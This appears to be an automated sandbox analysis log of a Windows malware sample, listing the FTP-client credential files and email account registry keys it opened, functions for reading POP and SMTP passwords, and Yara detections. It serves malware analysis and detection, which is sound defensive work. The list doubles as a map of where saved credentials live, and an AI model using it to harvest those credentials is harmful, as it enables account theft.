Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\FTP Explorer\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\AceBIT\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\sm.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\FlashFXP\3\Quick.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\FTPRush\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\Estsoft\ALFTP\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\ExpanDrive\drives.js			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\CuteFTP\sm.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.sqlite			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\4\Quick.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\GPSoftware\Directory Opus\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\FlashFXP\3\Sites.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.sqlite			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\FileZilla\sitemanager.xml			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\BlazeFtp\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\FTPGetter\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\SharedSettings.sqlite			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\AceBIT\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.sqlite			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\GHISLER\wcx_ftp.ini			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Windows\32BitFtp.ini			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\sm.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\LeapWare\LeapFTP\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\INSoftware\NovaFTP\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\FlashFXP\4\Quick.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\3D-FTP\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Frigate3\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\NetSarang\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\GPSoftware\Directory Opus\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\FTPRush\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\SharedSettings.sqlite			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\FlashFXP\3\History.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Sites.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_LOCAL_MACHINE\Software\TurboFTP			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Quick.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\FlashFXP\4\History.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.ccs			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Windows\wcx_ftp.ini			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\sm.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.sqlite			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\RhinoSoft.com\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\CuteFTP\sm.dat			Jump to behavior

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword		1_2_0040EBA3
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, SmtpPassword		1_2_0040EBA3

Remote Access Functionality

Source: Yara match	File source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR